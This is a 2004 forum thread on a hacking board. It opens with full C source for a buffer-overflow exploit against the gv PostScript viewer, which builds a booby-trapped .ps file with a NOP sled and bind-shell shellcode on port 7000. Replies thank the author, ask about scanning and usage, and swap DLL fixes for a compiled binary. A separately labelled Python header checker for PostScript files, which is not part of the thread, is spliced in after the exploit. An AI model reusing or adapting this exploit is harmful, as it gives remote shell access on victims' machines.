riga
Aug 17 2004, 10:10 AM
CODE
/*
 * gv postscript viewer exploit , infamous42md AT hotpop DOT com
 *
 * run of the mill bof. spawns a remote shell on port 7000. woopty doo. if
 * someone has been able to exploit the heap overflow in cfengine, please email
 * me and teach me something. after days of pain i've concluded it's not
 * possible b/c you can't manipulate the heap enough to get anything good in
 * front of you. please prove me wrong so i can learn.
 *
 * shouts to mitakeet
 *
 * [n00b localho outernet] netstat -ant | grep 7000
 * [n00b localho outernet] gcc -Wall -o gvown gvown.c
 * [n00b localho outernet] ./gvown 0xbffff350
 * [n00b localho outernet] ./gv h4x0ring_sacr3ts_uncuv3red.ps
 * [n00b localho outernet] netstat -ant | grep 7000
 * tcp 0 0 0.0.0.0:7000 0.0.0.0:* LISTEN
 */
#include <stdio.h>
#include <sys/types.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define NOP 0x90
#define NNOPS 512
#define die(x) do{perror(x); exit(EXIT_FAILURE);}while(0)
#define BS 0x10000
#define RETADDR_BYTES 400
#define PS_COMMENT "%!PS-Adobe- "
#define OUTFILE "h4x0ring_sacr3ts_uncuv3red.ps"

/* call them on port 7000, mine */
char remote[] =
    "\x31\xc0\x50\x50\x66\xc7\x44\x24\x02\x1b\x58\xc6\x04\x24\x02\x89\xe6"
    "\xb0\x02\xcd\x80\x85\xc0\x74\x08\x31\xc0\x31\xdb\xb0\x01\xcd\x80\x50"
    "\x6a\x01\x6a\x02\x89\xe1\x31\xdb\xb0\x66\xb3\x01\xcd\x80\x89\xc5\x6a"
    "\x10\x56\x50\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x55\x89\xe1\x31"
    "\xc0\x31\xdb\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x50\x50\x55\x89\xe1\xb0"
    "\x66\xb3\x05\xcd\x80\x89\xc5\x31\xc0\x89\xeb\x31\xc9\xb0\x3f\xcd\x80"
    "\x41\x80\xf9\x03\x7c\xf6\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62"
    "\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
    int len, x, fd;
    char buf[BS];
    u_long retaddr;

    if(argc < 2){
        fprintf(stderr, "Usage: %s < retaddr >\n", argv[0]);
        return EXIT_FAILURE;
    }
    sscanf(argv[1], "%lx", &retaddr);

    /* create 3vil buf */
    memset(buf, NOP, BS);
    strcpy(buf, PS_COMMENT);
    len = strlen(buf);
    for(x = 0; x < RETADDR_BYTES - 3; x += sizeof(retaddr))
        memcpy(buf+x+len, &retaddr, sizeof(retaddr));
    len += x + NNOPS;
    strcpy(buf+len, remote);
    strcat(buf+len, "\n");
    len += strlen(remote) + 1; /* + NULL */

    /* create the 3vil file */
    if( (fd = open(OUTFILE, O_RDWR|O_CREAT|O_EXCL, 0666)) < 0)
        die("open");
    if(write(fd, buf, len) < 0)
        die("write");
    close(fd);
    return 0;
}
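The generator above writes a .ps file whose first line is the %!PS-Adobe- comment followed by hundreds of non-text bytes. As an added defensive check that is not part of the thread or the posted program, this Python function inspects only the header line of a PostScript file and flags the traits such a file has (oversized header, non-printable bytes, a long 0x90 run); the thresholds and both sample inputs are constructed here.

```python
PS_MAGIC = b"%!PS-Adobe-"
MAX_HEADER_LEN = 64   # assumed bound: real headers look like "%!PS-Adobe-3.0 EPSF-3.0"
NOP_SLED_MIN = 32     # assumed bound: this many consecutive 0x90 bytes is not a version comment

def longest_run(data: bytes, value: int) -> int:
    """Length of the longest run of the byte `value` in data."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best

def inspect_ps_header(data: bytes) -> dict:
    """Look only at the first line (the version comment) and report what is odd about it."""
    first_line, _, _ = data.partition(b"\n")
    findings = {
        "has_magic": first_line.startswith(PS_MAGIC),
        "header_len": len(first_line),
        "oversized_header": len(first_line) > MAX_HEADER_LEN,
        "non_printable": any(b < 0x20 or b > 0x7E for b in first_line),
        "nop_sled": longest_run(first_line, 0x90) >= NOP_SLED_MIN,
    }
    findings["suspicious"] = (findings["oversized_header"]
                              or findings["non_printable"]
                              or findings["nop_sled"])
    return findings

def build_sample(malicious: bool) -> bytes:
    """Constructed inputs: a plain document, and a stand-in with the posted generator's layout
    (version comment, repeated address bytes, 0x90 run, then a placeholder instead of a payload)."""
    if not malicious:
        return b"%!PS-Adobe-3.0\n%%Title: hello\n/Helvetica findfont 12 scalefont setfont\n"
    spray = (0xBFFFF350).to_bytes(4, "little") * 100   # the address the thread's usage line passes
    return b"%!PS-Adobe- " + spray + b"\x90" * 512 + b"PAYLOAD-PLACEHOLDER\n"

if __name__ == "__main__":
    for label in (False, True):
        print("malicious" if label else "benign", inspect_ps_header(build_sample(label)))
```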
SecureD
Aug 17 2004, 06:59 PM
hmmz, 13 downloads and I'm the first reply
c'mon dudes, think he deserves it!!
well tnx dude for the sploit
scan port 7000, right??
ZakOpath
Aug 17 2004, 07:10 PM
Wow, a new exploit. Is there anyone who can complete it? I tried it myself once,
didn't work
ZakOpath
Aug 17 2004, 07:12 PM
Lol sry, did not see that it already was completed
Thx for the sploit
SeNe
Aug 18 2004, 02:10 AM
thanks for the compiled exploit, let's try this new toy.
mandawar
Aug 18 2004, 10:15 AM
thanks for the nice exploit (the bin), would be useful. Mandawar
Killahbee
Aug 18 2004, 11:15 AM
QUOTE (peerke @ Aug 17 2004, 06:59 PM)
hmmz, 13 downloads and I'm the first reply
c'mon dudes, think he deserves it!!
well tnx dude for the sploit
scan port 7000, right??
Well good luck scanning on port 7000!!
jaune
Aug 18 2004, 11:46 AM
thanks for the exploit
Bombers
Aug 18 2004, 01:07 PM
thanks for the exploit, really nice work
SecureD
Aug 18 2004, 03:51 PM
QUOTE (Killahbee @ Aug 18 2004, 11:15 AM)
QUOTE (peerke @ Aug 17 2004, 06:59 PM)
hmmz, 13 downloads and I'm the first reply
c'mon dudes, think he deserves it!!
well tnx dude for the sploit
scan port 7000, right??
Well good luck scanning on port 7000!!
get lost bart
already found the right one
fre4k
Aug 18 2004, 04:06 PM
what's the right port to scan?
Port: 7000 spawns a remote shell on that port and it isn't the port to scan!
clems[
Aug 19 2004, 07:44 AM
What's the command to use it?? I don't understand. Thanks
riga
Aug 20 2004, 03:53 PM
Description:
Local buffer overflow exploit for gv postscript viewer. Spawns a shell on port 7000.
http://packetstormsecurity.nl/filedesc/gv-exploit.c.html
Edit: ohh sorry, wrong information, that is for the local sploit
sorry for my bad English ^^
prog
Aug 20 2004, 07:22 PM
CODE
The default port number is "40701".
is that correct?
ZakOpath
Aug 21 2004, 08:34 AM
I'm having some probs with cygwin.dll.. I have it in my system32 dir but there is this stupid error popping up all the time
ZakOpath
Aug 21 2004, 08:53 AM
cannot find producktSpot__getreent in the DLL-Dir cygwin.dll <. that's the error I get
riga
Aug 21 2004, 09:14 AM
test with this .dll